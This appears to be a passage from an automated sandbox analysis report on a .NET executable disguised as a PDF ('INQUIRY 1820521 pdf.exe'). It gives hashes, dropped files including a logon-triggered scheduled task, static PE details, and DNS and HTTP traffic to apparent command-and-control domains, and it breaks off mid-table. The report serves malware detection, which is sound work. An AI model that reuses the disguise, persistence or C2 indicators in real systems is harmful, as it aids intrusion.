                                                  SHA-512:95DD7E2AB0884A3EFD9E26033B337D1F97DDF9A8E9E9C4C32187DCD40622D8B1AC8CCDBA12A70A6B9075DF5E7F68DF2F8FBA4AB33DB4576BE9806B8E191802B7
                                                  Malicious:true
                                                  Reputation:high, very likely benign file
                                                  Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a
                                                  C:\Users\user\AppData\Local\Temp\tmp7085.tmp
                                                  Process:C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe
                                                  File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):1647
                                                  Entropy (8bit):5.192992199210482
                                                  Encrypted:false
                                                  SSDEEP:24:2dH4+SEqC/S7hblNMFp//rlMhEMjnGpwjpIgUYODOLD9RJh7h8gKBGyTtn:cbhK79lNQR/rydbz9I3YODOLNdq3n
                                                  MD5:FF62EF076287CFB81F8ED2C5EF6F9231
                                                  SHA1:2C615B6431D0EA97DC0E72ABD637E4BD45B85E3E
                                                  SHA-256:1744396F535974D7DF009A067FDCB0D34C03B44A10BD8FF3C3877F2D1AC74EF5
                                                  SHA-512:111B8BAE573593D17A6C6F0CDD9D408CC28994F316DF17081D0A6C2466B906593938C8D6C952093458C70C5B4DA51717F6BFBE1FBBBA1C10B247DD321A2E8ED4
                                                  Malicious:true
                                                  Reputation:low
                                                  Preview: <?xml version="1.0" encoding="UTF-16"?>..<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">.. <RegistrationInfo>.. <Date>2014-10-25T14:27:44.8929027</Date>.. <Author>computer\user</Author>.. </RegistrationInfo>.. <Triggers>.. <LogonTrigger>.. <Enabled>true</Enabled>.. <UserId>computer\user</UserId>.. </LogonTrigger>.. <RegistrationTrigger>.. <Enabled>false</Enabled>.. </RegistrationTrigger>.. </Triggers>.. <Principals>.. <Principal id="Author">.. <UserId>computer\user</UserId>.. <LogonType>InteractiveToken</LogonType>.. <RunLevel>LeastPrivilege</RunLevel>.. </Principal>.. </Principals>.. <Settings>.. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>.. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>.. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>.. <AllowHardTerminate>false</AllowHardTerminate>.. <StartWhenAvailable>true
                                                  C:\Users\user\AppData\Roaming\YAhcdYrYHFkNNf.exe
                                                  Process:C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe
                                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):859648
                                                  Entropy (8bit):7.488650786243638
                                                  Encrypted:false
                                                  SSDEEP:12288:QgmBkzuw0TQD6dNxvJ9HuRfJDv0CATOcZOd5ln4T7luAHdu0RReBqJTN/D7adhAS:BEAuw0O6FuRfmCAf4j2tTHc0WqZBw
                                                  MD5:DD3AE15E952C239AE6D87C8374B3B460
                                                  SHA1:F8D9DACEB3FF1DADABF9051A04BB4356C370FBDE
                                                  SHA-256:513357BE2837BB1211C3FE2A32D7E6CDECF75F6CF0DA1C2F0D198A38E3CDB759
                                                  SHA-512:E5813F6369FAA127D2BDE9AF907E7BB31CDE0665F16038E9B3796EF8A0BF227822F9FD84C15A5646B680F1080253BBCC0117A6F1EA1DBD9CEE275F081D341E28
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: Metadefender, Detection: 19%, Browse
                                                  • Antivirus: ReversingLabs, Detection: 41%
                                                  Reputation:low
                                                  Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....s`..............P..............1... ...@....@.. ....................................@..................................1..S....@..p....................`....................................................... ............... ..H............text........ ...................... ..`.rsrc...p....@......................@..@.reloc.......`......................@..B.................1......H........>..........9........d............................................"L.=.0..-..9#.*R.%-.Zj.bb. <...]....v]...=....YAu.....=..g..U.....A.Y.m...FR.S.~)............g|#aV.hV..#.v.9......bV.[.e.....9....)X+.g...g....#.q.uH....../....I`..L:%..g.....g.l:-v...x.6U.e.../......N.A.A.u..G.........*.,...S...c...6.T!8...i4..Jz....P{.'+....c'...zBj....h...!..b.Y....^....zI.>......#...f..my......A.AqlG...f.`.-...g.G.}T..X ..J........*&...;.t.j.U^.BlR)T.4,...9MN?
                                                  C:\Users\user\AppData\Roaming\YAhcdYrYHFkNNf.exe:Zone.Identifier
                                                  Process:C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe
                                                  File Type:ASCII text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):26
                                                  Entropy (8bit):3.95006375643621
                                                  Encrypted:false
                                                  SSDEEP:3:ggPYV:rPYV
                                                  MD5:187F488E27DB4AF347237FE461A079AD
                                                  SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                  SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                  SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                  Malicious:false
                                                  Reputation:high, very likely benign file
                                                  Preview: [ZoneTransfer]....ZoneId=0

                                                  Static File Info

                                                  General

                                                  File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Entropy (8bit):7.488650786243638
                                                  TrID:
                                                  • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                                                  • Win32 Executable (generic) a (10002005/4) 49.75%
                                                  • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                  • Windows Screen Saver (13104/52) 0.07%
                                                  • Generic Win/DOS Executable (2004/3) 0.01%
                                                  File name:INQUIRY 1820521 pdf.exe
                                                  File size:859648
                                                  MD5:dd3ae15e952c239ae6d87c8374b3b460
                                                  SHA1:f8d9daceb3ff1dadabf9051a04bb4356c370fbde
                                                  SHA256:513357be2837bb1211c3fe2a32d7e6cdecf75f6cf0da1c2f0d198a38e3cdb759
                                                  SHA512:e5813f6369faa127d2bde9af907e7bb31cde0665f16038e9b3796ef8a0bf227822f9fd84c15a5646b680f1080253bbcc0117a6f1ea1dbd9cee275f081d341e28
                                                  SSDEEP:12288:QgmBkzuw0TQD6dNxvJ9HuRfJDv0CATOcZOd5ln4T7luAHdu0RReBqJTN/D7adhAS:BEAuw0O6FuRfmCAf4j2tTHc0WqZBw
                                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....s`..............P..............1... ...@....@.. ....................................@................................

                                                  File Icon

                                                  Icon Hash:00828e8e8686b000

                                                  Static PE Info

                                                  General

                                                  Entrypoint:0x4d31ee
                                                  Entrypoint Section:.text
                                                  Digitally signed:false
                                                  Imagebase:0x400000
                                                  Subsystem:windows gui
                                                  Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE
                                                  DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                                  Time Stamp:0x607312B4 [Sun Apr 11 15:16:04 2021 UTC]
                                                  TLS Callbacks:
                                                  CLR (.Net) Version:v4.0.30319
                                                  OS Version Major:4
                                                  OS Version Minor:0
                                                  File Version Major:4
                                                  File Version Minor:0
                                                  Subsystem Version Major:4
                                                  Subsystem Version Minor:0
                                                  Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                  Entrypoint Preview

                                                  Instruction
                                                  jmp dword ptr [00402000h]
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al

                                                  Data Directories

                                                  NameVirtual AddressVirtual Size Is in Section
                                                  IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_IMPORT0xd31980x53.text
                                                  IMAGE_DIRECTORY_ENTRY_RESOURCE0xd40000x670.rsrc
                                                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_BASERELOC0xd60000xc.reloc
                                                  IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                  Sections

                                                  NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                  .text0x20000xd11f40xd1200False0.766435202481data7.49655840913IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                  .rsrc0xd40000x6700x800False0.3427734375data3.61228309464IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                  .reloc0xd60000xc0x200False0.044921875data0.101910425663IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                  Resources

                                                  NameRVASizeTypeLanguageCountry
                                                  RT_VERSION0xd40a00x3e0data
                                                  RT_MANIFEST0xd44800x1eaXML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators

                                                  Imports

                                                  DLLImport
                                                  mscoree.dll_CorExeMain

                                                  Version Infos

                                                  DescriptionData
                                                  Translation0x0000 0x04b0
                                                  LegalCopyrightCopyright CodeUnit 2007
                                                  Assembly Version2007.8.28.1
                                                  InternalNameFormattableString.exe
                                                  FileVersion2007.08.28.1
                                                  CompanyNameCodeUnit
                                                  LegalTrademarks
                                                  CommentsImage Size Standardiser
                                                  ProductNameImage Size Standardiser
                                                  ProductVersion2007.08.28.1
                                                  FileDescriptionImage Size Standardiser
                                                  OriginalFilenameFormattableString.exe

                                                  Network Behavior

                                                  Network Port Distribution

                                                  TCP Packets

                                                  TimestampSource PortDest PortSource IPDest IP
                                                  Apr 12, 2021 09:43:23.605489969 CEST4973280192.168.2.4210.152.87.233
                                                  Apr 12, 2021 09:43:23.893817902 CEST8049732210.152.87.233192.168.2.4
                                                  Apr 12, 2021 09:43:23.894022942 CEST4973280192.168.2.4210.152.87.233
                                                  Apr 12, 2021 09:43:23.894160032 CEST4973280192.168.2.4210.152.87.233
                                                  Apr 12, 2021 09:43:24.183762074 CEST8049732210.152.87.233192.168.2.4
                                                  Apr 12, 2021 09:43:24.183934927 CEST8049732210.152.87.233192.168.2.4
                                                  Apr 12, 2021 09:43:24.183948040 CEST8049732210.152.87.233192.168.2.4
                                                  Apr 12, 2021 09:43:24.184182882 CEST4973280192.168.2.4210.152.87.233
                                                  Apr 12, 2021 09:43:24.184211969 CEST4973280192.168.2.4210.152.87.233
                                                  Apr 12, 2021 09:43:24.476608992 CEST8049732210.152.87.233192.168.2.4
                                                  Apr 12, 2021 09:43:44.543428898 CEST4974080192.168.2.4198.185.159.144
                                                  Apr 12, 2021 09:43:44.678457975 CEST8049740198.185.159.144192.168.2.4
                                                  Apr 12, 2021 09:43:44.678567886 CEST4974080192.168.2.4198.185.159.144
                                                  Apr 12, 2021 09:43:44.678704023 CEST4974080192.168.2.4198.185.159.144
                                                  Apr 12, 2021 09:43:44.813456059 CEST8049740198.185.159.144192.168.2.4
                                                  Apr 12, 2021 09:43:44.813931942 CEST8049740198.185.159.144192.168.2.4
                                                  Apr 12, 2021 09:43:44.813957930 CEST8049740198.185.159.144192.168.2.4
                                                  Apr 12, 2021 09:43:44.813977003 CEST8049740198.185.159.144192.168.2.4
                                                  Apr 12, 2021 09:43:44.813988924 CEST8049740198.185.159.144192.168.2.4
                                                  Apr 12, 2021 09:43:44.814007044 CEST8049740198.185.159.144192.168.2.4
                                                  Apr 12, 2021 09:43:44.814023972 CEST8049740198.185.159.144192.168.2.4
                                                  Apr 12, 2021 09:43:44.814052105 CEST8049740198.185.159.144192.168.2.4
                                                  Apr 12, 2021 09:43:44.814085007 CEST8049740198.185.159.144192.168.2.4
                                                  Apr 12, 2021 09:43:44.814115047 CEST8049740198.185.159.144192.168.2.4
                                                  Apr 12, 2021 09:43:44.814137936 CEST4974080192.168.2.4198.185.159.144
                                                  Apr 12, 2021 09:43:44.814167023 CEST4974080192.168.2.4198.185.159.144
                                                  Apr 12, 2021 09:43:44.814181089 CEST8049740198.185.159.144192.168.2.4
                                                  Apr 12, 2021 09:43:44.814248085 CEST4974080192.168.2.4198.185.159.144
                                                  Apr 12, 2021 09:43:44.814308882 CEST4974080192.168.2.4198.185.159.144
                                                  Apr 12, 2021 09:43:44.946779966 CEST8049740198.185.159.144192.168.2.4
                                                  Apr 12, 2021 09:43:44.946857929 CEST8049740198.185.159.144192.168.2.4
                                                  Apr 12, 2021 09:43:44.946890116 CEST4974080192.168.2.4198.185.159.144
                                                  Apr 12, 2021 09:43:44.946923971 CEST4974080192.168.2.4198.185.159.144
                                                  Apr 12, 2021 09:43:44.946966887 CEST8049740198.185.159.144192.168.2.4
                                                  Apr 12, 2021 09:43:44.947017908 CEST8049740198.185.159.144192.168.2.4
                                                  Apr 12, 2021 09:43:44.947036982 CEST4974080192.168.2.4198.185.159.144
                                                  Apr 12, 2021 09:43:44.947081089 CEST4974080192.168.2.4198.185.159.144
                                                  Apr 12, 2021 09:43:44.947123051 CEST8049740198.185.159.144192.168.2.4
                                                  Apr 12, 2021 09:43:44.947174072 CEST8049740198.185.159.144192.168.2.4
                                                  Apr 12, 2021 09:43:44.947195053 CEST4974080192.168.2.4198.185.159.144
                                                  Apr 12, 2021 09:43:44.947261095 CEST8049740198.185.159.144192.168.2.4
                                                  Apr 12, 2021 09:43:44.947295904 CEST4974080192.168.2.4198.185.159.144
                                                  Apr 12, 2021 09:43:44.947321892 CEST4974080192.168.2.4198.185.159.144
                                                  Apr 12, 2021 09:43:44.947369099 CEST8049740198.185.159.144192.168.2.4
                                                  Apr 12, 2021 09:43:44.947427988 CEST8049740198.185.159.144192.168.2.4
                                                  Apr 12, 2021 09:43:44.947441101 CEST4974080192.168.2.4198.185.159.144
                                                  Apr 12, 2021 09:43:44.947489023 CEST4974080192.168.2.4198.185.159.144
                                                  Apr 12, 2021 09:43:44.947525978 CEST8049740198.185.159.144192.168.2.4
                                                  Apr 12, 2021 09:43:44.947575092 CEST8049740198.185.159.144192.168.2.4
                                                  Apr 12, 2021 09:43:44.947594881 CEST4974080192.168.2.4198.185.159.144
                                                  Apr 12, 2021 09:43:44.947635889 CEST4974080192.168.2.4198.185.159.144
                                                  Apr 12, 2021 09:43:44.947668076 CEST8049740198.185.159.144192.168.2.4
                                                  Apr 12, 2021 09:43:44.947736979 CEST8049740198.185.159.144192.168.2.4
                                                  Apr 12, 2021 09:43:44.947753906 CEST4974080192.168.2.4198.185.159.144
                                                  Apr 12, 2021 09:43:44.947802067 CEST4974080192.168.2.4198.185.159.144
                                                  Apr 12, 2021 09:43:44.947839975 CEST8049740198.185.159.144192.168.2.4
                                                  Apr 12, 2021 09:43:44.947899103 CEST8049740198.185.159.144192.168.2.4
                                                  Apr 12, 2021 09:43:44.947911024 CEST4974080192.168.2.4198.185.159.144
                                                  Apr 12, 2021 09:43:44.947951078 CEST4974080192.168.2.4198.185.159.144
                                                  Apr 12, 2021 09:43:44.947978020 CEST8049740198.185.159.144192.168.2.4
                                                  Apr 12, 2021 09:43:44.948043108 CEST8049740198.185.159.144192.168.2.4
                                                  Apr 12, 2021 09:43:44.948056936 CEST4974080192.168.2.4198.185.159.144
                                                  Apr 12, 2021 09:43:44.948103905 CEST4974080192.168.2.4198.185.159.144
                                                  Apr 12, 2021 09:43:44.948132992 CEST8049740198.185.159.144192.168.2.4
                                                  Apr 12, 2021 09:43:44.948187113 CEST8049740198.185.159.144192.168.2.4
                                                  Apr 12, 2021 09:43:44.948227882 CEST4974080192.168.2.4198.185.159.144
                                                  Apr 12, 2021 09:43:44.948265076 CEST4974080192.168.2.4198.185.159.144
                                                  Apr 12, 2021 09:43:44.948298931 CEST8049740198.185.159.144192.168.2.4
                                                  Apr 12, 2021 09:43:44.948364019 CEST4974080192.168.2.4198.185.159.144
                                                  Apr 12, 2021 09:44:05.095738888 CEST4974580192.168.2.4104.21.82.58
                                                  Apr 12, 2021 09:44:05.136625051 CEST8049745104.21.82.58192.168.2.4
                                                  Apr 12, 2021 09:44:05.136746883 CEST4974580192.168.2.4104.21.82.58
                                                  Apr 12, 2021 09:44:05.136970043 CEST4974580192.168.2.4104.21.82.58
                                                  Apr 12, 2021 09:44:05.177731991 CEST8049745104.21.82.58192.168.2.4
                                                  Apr 12, 2021 09:44:05.511739969 CEST8049745104.21.82.58192.168.2.4
                                                  Apr 12, 2021 09:44:05.511765957 CEST8049745104.21.82.58192.168.2.4
                                                  Apr 12, 2021 09:44:05.511779070 CEST8049745104.21.82.58192.168.2.4
                                                  Apr 12, 2021 09:44:05.511795044 CEST8049745104.21.82.58192.168.2.4
                                                  Apr 12, 2021 09:44:05.511806965 CEST8049745104.21.82.58192.168.2.4
                                                  Apr 12, 2021 09:44:05.511820078 CEST8049745104.21.82.58192.168.2.4
                                                  Apr 12, 2021 09:44:05.511832952 CEST8049745104.21.82.58192.168.2.4
                                                  Apr 12, 2021 09:44:05.512187958 CEST4974580192.168.2.4104.21.82.58
                                                  Apr 12, 2021 09:44:05.512254000 CEST8049745104.21.82.58192.168.2.4
                                                  Apr 12, 2021 09:44:05.512424946 CEST4974580192.168.2.4104.21.82.58
                                                  Apr 12, 2021 09:44:05.512471914 CEST4974580192.168.2.4104.21.82.58

                                                  UDP Packets

                                                  TimestampSource PortDest PortSource IPDest IP
                                                  Apr 12, 2021 09:42:00.456115961 CEST5372353192.168.2.48.8.8.8
                                                  Apr 12, 2021 09:42:00.514817953 CEST53537238.8.8.8192.168.2.4
                                                  Apr 12, 2021 09:42:20.638798952 CEST6464653192.168.2.48.8.8.8
                                                  Apr 12, 2021 09:42:20.687649965 CEST53646468.8.8.8192.168.2.4
                                                  Apr 12, 2021 09:42:21.712238073 CEST6529853192.168.2.48.8.8.8
                                                  Apr 12, 2021 09:42:21.762784004 CEST53652988.8.8.8192.168.2.4
                                                  Apr 12, 2021 09:42:34.555367947 CEST5912353192.168.2.48.8.8.8
                                                  Apr 12, 2021 09:42:34.664411068 CEST53591238.8.8.8192.168.2.4
                                                  Apr 12, 2021 09:42:49.369050980 CEST5453153192.168.2.48.8.8.8
                                                  Apr 12, 2021 09:42:49.417623997 CEST53545318.8.8.8192.168.2.4
                                                  Apr 12, 2021 09:42:54.105889082 CEST4971453192.168.2.48.8.8.8
                                                  Apr 12, 2021 09:42:54.168118000 CEST53497148.8.8.8192.168.2.4
                                                  Apr 12, 2021 09:42:56.157164097 CEST5802853192.168.2.48.8.8.8
                                                  Apr 12, 2021 09:42:56.208149910 CEST53580288.8.8.8192.168.2.4
                                                  Apr 12, 2021 09:43:04.455533028 CEST5309753192.168.2.48.8.8.8
                                                  Apr 12, 2021 09:43:04.512917042 CEST53530978.8.8.8192.168.2.4
                                                  Apr 12, 2021 09:43:08.032691956 CEST4925753192.168.2.48.8.8.8
                                                  Apr 12, 2021 09:43:08.082890987 CEST53492578.8.8.8192.168.2.4
                                                  Apr 12, 2021 09:43:09.052828074 CEST6238953192.168.2.48.8.8.8
                                                  Apr 12, 2021 09:43:09.109514952 CEST53623898.8.8.8192.168.2.4
                                                  Apr 12, 2021 09:43:11.218777895 CEST4991053192.168.2.48.8.8.8
                                                  Apr 12, 2021 09:43:11.270282030 CEST53499108.8.8.8192.168.2.4
                                                  Apr 12, 2021 09:43:13.203537941 CEST5585453192.168.2.48.8.8.8
                                                  Apr 12, 2021 09:43:13.264770985 CEST53558548.8.8.8192.168.2.4
                                                  Apr 12, 2021 09:43:18.238046885 CEST6454953192.168.2.48.8.8.8
                                                  Apr 12, 2021 09:43:18.288515091 CEST53645498.8.8.8192.168.2.4
                                                  Apr 12, 2021 09:43:21.329164028 CEST6315353192.168.2.48.8.8.8
                                                  Apr 12, 2021 09:43:21.379790068 CEST53631538.8.8.8192.168.2.4
                                                  Apr 12, 2021 09:43:23.290195942 CEST5299153192.168.2.48.8.8.8
                                                  Apr 12, 2021 09:43:23.596867085 CEST53529918.8.8.8192.168.2.4
                                                  Apr 12, 2021 09:43:33.223427057 CEST5370053192.168.2.48.8.8.8
                                                  Apr 12, 2021 09:43:33.272212029 CEST53537008.8.8.8192.168.2.4
                                                  Apr 12, 2021 09:43:39.423446894 CEST5172653192.168.2.48.8.8.8
                                                  Apr 12, 2021 09:43:39.484484911 CEST53517268.8.8.8192.168.2.4
                                                  Apr 12, 2021 09:43:44.394011974 CEST5679453192.168.2.48.8.8.8
                                                  Apr 12, 2021 09:43:44.542443037 CEST53567948.8.8.8192.168.2.4
                                                  Apr 12, 2021 09:43:48.578572035 CEST5653453192.168.2.48.8.8.8
                                                  Apr 12, 2021 09:43:48.627163887 CEST53565348.8.8.8192.168.2.4
                                                  Apr 12, 2021 09:43:50.366496086 CEST5662753192.168.2.48.8.8.8
                                                  Apr 12, 2021 09:43:50.418059111 CEST53566278.8.8.8192.168.2.4
                                                  Apr 12, 2021 09:44:00.188711882 CEST5662153192.168.2.48.8.8.8
                                                  Apr 12, 2021 09:44:00.237473965 CEST53566218.8.8.8192.168.2.4
                                                  Apr 12, 2021 09:44:01.306541920 CEST6311653192.168.2.48.8.8.8
                                                  Apr 12, 2021 09:44:01.356829882 CEST53631168.8.8.8192.168.2.4
                                                  Apr 12, 2021 09:44:05.012470007 CEST6407853192.168.2.48.8.8.8
                                                  Apr 12, 2021 09:44:05.094029903 CEST53640788.8.8.8192.168.2.4
                                                  Apr 12, 2021 09:44:10.813304901 CEST6480153192.168.2.48.8.8.8
                                                  Apr 12, 2021 09:44:10.863642931 CEST53648018.8.8.8192.168.2.4
                                                  Apr 12, 2021 09:44:11.542563915 CEST6172153192.168.2.48.8.8.8
                                                  Apr 12, 2021 09:44:11.591170073 CEST53617218.8.8.8192.168.2.4
                                                  Apr 12, 2021 09:44:11.745171070 CEST5125553192.168.2.48.8.8.8
                                                  Apr 12, 2021 09:44:11.796700954 CEST53512558.8.8.8192.168.2.4
                                                  Apr 12, 2021 09:44:12.598717928 CEST6152253192.168.2.48.8.8.8
                                                  Apr 12, 2021 09:44:12.658663034 CEST53615228.8.8.8192.168.2.4
                                                  Apr 12, 2021 09:44:12.730773926 CEST5233753192.168.2.48.8.8.8
                                                  Apr 12, 2021 09:44:12.805257082 CEST53523378.8.8.8192.168.2.4
                                                  Apr 12, 2021 09:44:13.414093971 CEST5504653192.168.2.48.8.8.8
                                                  Apr 12, 2021 09:44:13.463342905 CEST53550468.8.8.8192.168.2.4

                                                  DNS Queries

                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                  Apr 12, 2021 09:43:23.290195942 CEST192.168.2.48.8.8.80xfaa4Standard query (0)www.hhcuerkn.comA (IP address)IN (0x0001)
                                                  Apr 12, 2021 09:43:44.394011974 CEST192.168.2.48.8.8.80x82d5Standard query (0)www.mobcitylabs.comA (IP address)IN (0x0001)
                                                  Apr 12, 2021 09:44:05.012470007 CEST192.168.2.48.8.8.80x3402Standard query (0)www.xinghai-nb.comA (IP address)IN (0x0001)

                                                  DNS Answers

                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                  Apr 12, 2021 09:43:23.596867085 CEST8.8.8.8192.168.2.40xfaa4No error (0)www.hhcuerkn.comhhcuerkn.comCNAME (Canonical name)IN (0x0001)
                                                  Apr 12, 2021 09:43:23.596867085 CEST8.8.8.8192.168.2.40xfaa4No error (0)hhcuerkn.com210.152.87.233A (IP address)IN (0x0001)
                                                  Apr 12, 2021 09:43:44.542443037 CEST8.8.8.8192.168.2.40x82d5No error (0)www.mobcitylabs.comext-sq.squarespace.comCNAME (Canonical name)IN (0x0001)
                                                  Apr 12, 2021 09:43:44.542443037 CEST8.8.8.8192.168.2.40x82d5No error (0)ext-sq.squarespace.com198.185.159.144A (IP address)IN (0x0001)
                                                  Apr 12, 2021 09:43:44.542443037 CEST8.8.8.8192.168.2.40x82d5No error (0)ext-sq.squarespace.com198.49.23.145A (IP address)IN (0x0001)
                                                  Apr 12, 2021 09:43:44.542443037 CEST8.8.8.8192.168.2.40x82d5No error (0)ext-sq.squarespace.com198.185.159.145A (IP address)IN (0x0001)
                                                  Apr 12, 2021 09:43:44.542443037 CEST8.8.8.8192.168.2.40x82d5No error (0)ext-sq.squarespace.com198.49.23.144A (IP address)IN (0x0001)
                                                  Apr 12, 2021 09:44:05.094029903 CEST8.8.8.8192.168.2.40x3402No error (0)www.xinghai-nb.com104.21.82.58A (IP address)IN (0x0001)
                                                  Apr 12, 2021 09:44:05.094029903 CEST8.8.8.8192.168.2.40x3402No error (0)www.xinghai-nb.com172.67.153.207A (IP address)IN (0x0001)

                                                  HTTP Request Dependency Graph

                                                  • www.hhcuerkn.com
                                                  • www.mobcitylabs.com
                                                  • www.xinghai-nb.com

                                                  HTTP Packets

                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                  0192.168.2.449732210.152.87.23380C:\Windows\explorer.exe
                                                  TimestampkBytes transferredDirectionData
